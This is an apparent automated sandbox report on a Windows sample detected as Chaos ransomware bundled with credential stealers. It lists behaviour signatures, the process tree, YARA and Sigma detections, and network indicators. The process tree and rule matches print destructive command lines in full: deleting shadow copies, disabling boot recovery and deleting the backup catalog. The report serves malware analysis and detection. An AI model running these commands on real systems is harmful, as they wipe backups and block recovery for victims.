Windows Analysis Report
4wx72yFLka.exe

Overview

General Information

Sample name:4wx72yFLka.exe
renamed because original name is a hash value
Original sample name:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a.exe
Analysis ID:1504078
MD5:fe194bd31f2388a09bbef24ddaa212ce
SHA1:cb01c1cb0a2fc192c28b3d7864e739d9d8575e08
SHA256:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a
Tags:exemaster-repogen-vercel-app

Detection

Python Stealer, CStealer, Chaos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
Yara detected CStealer
Yara detected Chaos Ransomware
.NET source code contains very large strings
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to disable the Task Manager (.Net Source)
Creates files inside the volume driver (system volume information)
Deletes itself after installation
Deletes shadow drive data (may be related to ransomware)
Deletes the backup plan of Windows
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops PE files with benign system names
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Writes many files with high entropy
Yara detected Generic Python Stealer
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a Chrome extension
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 4wx72yFLka.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\4wx72yFLka.exe" MD5: FE194BD31F2388A09BBEF24DDAA212CE)
    • Mai.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\Mai.exe" MD5: 14F564392EEC0B9EDA9530411159057C)
      • Mai.exe (PID: 7740 cmdline: "C:\Users\user\Desktop\Mai.exe" MD5: 14F564392EEC0B9EDA9530411159057C)
        • cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • main.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\main.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
      • svchost.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
        • cmd.exe (PID: 7936 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • vssadmin.exe (PID: 7976 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
          • WMIC.exe (PID: 8164 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • cmd.exe (PID: 1384 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • bcdedit.exe (PID: 3712 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
          • bcdedit.exe (PID: 5332 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
        • cmd.exe (PID: 3404 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wbadmin.exe (PID: 2848 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
        • notepad.exe (PID: 7020 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 8060 cmdline: C:\Windows\System32\svchost.exe -k swprv MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wbengine.exe (PID: 5368 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 17270A354A66590953C4AAC1CF54E507)
  • vdsldr.exe (PID: 4068 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • vds.exe (PID: 6680 cmdline: C:\Windows\System32\vds.exe MD5: 0781CE7ECCD9F6318BA72CD96B5B8992)
  • svchost.exe (PID: 7008 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
    • cmd.exe (PID: 7628 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 5736 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • WMIC.exe (PID: 7988 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • cmd.exe (PID: 6136 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bcdedit.exe (PID: 8016 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 5872 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
    • cmd.exe (PID: 4940 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wbadmin.exe (PID: 6380 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • notepad.exe (PID: 8000 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 3676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3828 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 840EB9E50C131322605C5EA90AE1312F)
  • notepad.exe (PID: 7068 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
Name: DynamicStealer
Description: Dynamic Stealer is a GitHub project written in C# by L1ghtN4n. This code collects passwords and uploads them to Telegram. According to Cyble, Eternity Stealer leverages code from this project, and Jester Stealer could also be rebranded from it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dynamicstealer

Name: Chaos
Description: In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos
No configs have been found
Source: C:\Users\user\AppData\Roaming\svchost.exe; Rule: JoeSecurity_Chaos_1; Description: Yara detected Chaos Ransomware; Author: Joe Security
Source: C:\Users\user\AppData\Roaming\svchost.exe; Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM; Description: Detects executables containing many references to VEEAM. Observed in ransomware; Author: unknown
  • 0x4f94:$s1: VeeamNFSSvc
  • 0x4f42:$s9: VeeamTransportSvc
  • 0x4f66:$s10: VeeamDeploymentService
Source: C:\Users\user\AppData\Roaming\svchost.exe; Rule: MALWARE_Win_Chaos; Description: Detects Chaos ransomware; Author: ditekSHen
  • 0x50dc:$s3: C:\Users\
  • 0x149cb9:$s4: read_it.txt
  • 0x149cf5:$s6: (?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})
  • 0x30c0:$s7: checkSpread
  • 0x3114:$s7: checkSleep
  • 0x315e:$s7: checkAdminPrivilage
  • 0x3172:$s7: checkdeleteShadowCopies
  • 0x318a:$s7: checkdisableRecoveryMode
  • 0x31a3:$s7: checkdeleteBackupCatalog
  • 0x341f:$s8: deleteShadowCopies
  • 0x3432:$s8: disableRecoveryMode
  • 0x3446:$s8: deleteBackupCatalog
  • 0x30cc:$s9: spreadName
  • 0x30e8:$s10: processName
  • 0x32b4:$s11: sleepOutOfTempFolder
  • 0x32d7:$s12: AlreadyRunning
  • 0x332d:$s14: encryptDirectory
  • 0x3a44:$s14: encryptDirectory
  • 0x3a5b:$s14: encryptDirectory
  • 0x3a8c:$s14: encryptDirectory
  • 0x34bc:$s16: intpreclp
Source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CStealer; Description: Yara detected CStealer; Author: Joe Security
Source: 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_Chaos_1; Description: Yara detected Chaos Ransomware; Author: Joe Security
Source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_CStealer; Description: Yara detected CStealer; Author: Joe Security
Source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CStealer; Description: Yara detected CStealer; Author: Joe Security
Source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CStealer; Description: Yara detected CStealer; Author: Joe Security
Source: 3.2.main.exe.126e8a00.1.raw.unpack; Rule: JoeSecurity_Chaos_1; Description: Yara detected Chaos Ransomware; Author: Joe Security
Source: 3.2.main.exe.126e8a00.1.raw.unpack; Rule: Destructive_Ransomware_Gen1; Description: Detects destructive malware; Author: Florian Roth
  • 0x4b44:$x1: /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
  • 0x4acb:$x2: delete shadows /all /quiet
  • 0x4c10:$x3: delete catalog -quiet
Source: 3.2.main.exe.126e8a00.1.raw.unpack; Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM; Description: Detects executables containing many references to VEEAM. Observed in ransomware; Author: unknown
  • 0x4f94:$s1: VeeamNFSSvc
  • 0x4f42:$s9: VeeamTransportSvc
  • 0x4f66:$s10: VeeamDeploymentService
Source: 3.2.main.exe.126e8a00.1.raw.unpack; Rule: MALWARE_Win_Chaos; Description: Detects Chaos ransomware; Author: ditekSHen
  • 0x50dc:$s3: C:\Users\
  • 0x30c0:$s7: checkSpread
  • 0x3114:$s7: checkSleep
  • 0x315e:$s7: checkAdminPrivilage
  • 0x3172:$s7: checkdeleteShadowCopies
  • 0x318a:$s7: checkdisableRecoveryMode
  • 0x31a3:$s7: checkdeleteBackupCatalog
  • 0x341f:$s8: deleteShadowCopies
  • 0x3432:$s8: disableRecoveryMode
  • 0x3446:$s8: deleteBackupCatalog
  • 0x30cc:$s9: spreadName
  • 0x30e8:$s10: processName
  • 0x32b4:$s11: sleepOutOfTempFolder
  • 0x32d7:$s12: AlreadyRunning
  • 0x332d:$s14: encryptDirectory
  • 0x3a44:$s14: encryptDirectory
  • 0x3a5b:$s14: encryptDirectory
  • 0x3a8c:$s14: encryptDirectory
  • 0x34bc:$s16: intpreclp
  • 0x358c:$s18: textToEncrypt
Source: 3.2.main.exe.126e8a00.1.unpack; Rule: JoeSecurity_Chaos_1; Description: Yara detected Chaos Ransomware; Author: Joe Security

                  Operating System Destruction

                  Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7772, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, ProcessId: 7936, ProcessName: cmd.exe

                  System Summary

                  Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\main.exe, ProcessId: 7676, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                  Source: Process started; Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades); Data: Command: vssadmin delete shadows /all /quiet, CommandLine: vssadmin delete shadows /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7936, ParentProcessName: cmd.exe, ProcessCommandLine: vssadmin delete shadows /all /quiet, ProcessId: 7976, ProcessName: vssadmin.exe
                  Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe" , ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7676, ParentProcessName: main.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7772, ProcessName: svchost.exe
                  Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7772, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateTask
                  Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7772, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                  Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7772, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete, ProcessId: 7936, ProcessName: cmd.exe
                  Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe" , ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7676, ParentProcessName: main.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7772, ProcessName: svchost.exe
                  Source: Process started; Author: vburov; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe" , ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7676, ParentProcessName: main.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7772, ProcessName: svchost.exe
                  No Suricata rule has matched

                  AV Detection

                  Source: 4wx72yFLka.exe; ReversingLabs: Detection: 63%
                  Source: 4wx72yFLka.exe; Virustotal: Detection: 50%
                  Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.8% probability
                  Source: 4wx72yFLka.exe; Joe Sandbox ML: detected
                  Source: 4wx72yFLka.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\Mai.exe; File created: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\LICENSE.txt
                  Source: 4wx72yFLka.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4wx72yFLka.exe, 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp, 4wx72yFLka.exe, 00000000.00000000.1441129724.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Mai.exe, 00000004.00000002.2728305231.00007FFBA4840000.00000002.00000001.01000000.00000021.sdmp
                  Source: Binary string: ucrtbase.pdb source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Mai.exe, 00000004.00000002.2742453424.00007FFBBB3F6000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Mai.exe, 00000004.00000002.2744924304.00007FFBBC703000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Mai.exe, 00000004.00000002.2743543663.00007FFBBB430000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2741399937.00007FFBB4C47000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: .core.pdb.ico.pas source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000003.00000002.1536320956.00000000126FB000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Mai.exe, 00000004.00000002.2739578308.00007FFBAA2B2000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Mai.exe, 00000004.00000002.2744320710.00007FFBBC343000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2743176321.00007FFBBB40D000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Mai.exe, 00000004.00000002.2741731661.00007FFBB6298000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Mai.exe, 00000004.00000002.2727988873.00007FFBA471E000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Mai.exe, 00000004.00000002.2708525188.000001995DDB0000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdb source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\System32\wbengine.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe; Code function: 0_2_0004BA74 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004BA74
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe; Code function: 0_2_0005D2A0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005D2A0
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe; Code function: 0_2_0006C358 FindFirstFileExA,0_2_0006C358
                  Source: C:\Users\user\Desktop\Mai.exe; Code function: 2_2_00007FF6DD667E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exe; Code function: 2_2_00007FF6DD6588D0 FindFirstFileExW,FindClose,2_2_00007FF6DD6588D0
                  Source: C:\Users\user\Desktop\Mai.exe; Code function: 2_2_00007FF6DD671EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6DD671EE4
                  Source: C:\Users\user\Desktop\Mai.exe; File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dll
                  Source: C:\Users\user\Desktop\Mai.exe; File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dll
                  Source: C:\Users\user\Desktop\Mai.exe; File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pyd
                  Source: C:\Users\user\Desktop\Mai.exe; File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\
                  Source: C:\Users\user\Desktop\Mai.exe; File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dll
                  Source: C:\Users\user\Desktop\Mai.exe; File opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dll

                  Networking

                  Source: unknown; DNS query: name: rentry.co
                  Source: Joe Sandbox View; IP Address: 104.26.3.16
